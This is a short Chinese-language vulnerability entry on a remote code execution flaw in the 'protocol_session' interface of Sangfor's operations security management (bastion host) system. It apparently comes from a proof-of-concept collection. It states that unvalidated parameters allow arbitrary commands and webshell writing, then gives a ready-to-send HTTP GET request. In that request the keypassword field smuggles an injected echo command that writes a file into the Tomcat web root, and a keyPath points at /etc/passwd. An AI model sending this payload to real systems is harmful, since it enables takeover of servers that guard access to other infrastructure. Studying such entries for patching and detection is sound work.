漏洞描述
深信服运维安全管理系统接口protocol_session未对传入的参数进行校验,导致在堡垒机设备服务器执行任意命令,可写入webshell获取服务器远程控制权限。
深信服运维安全管理系统 protocol_session 远程代码执行漏洞
PoC代码
GET /isomp-protocol/protocol/session?keyPath=/etc/passwd&protocol=ssh&keypassword=123456%27%3Becho+fd827c76d2+%3E%20/usr/local/tomcat/webapps/fort/trust/version/randomstr.txt;&sshd=1 HTTP/1.1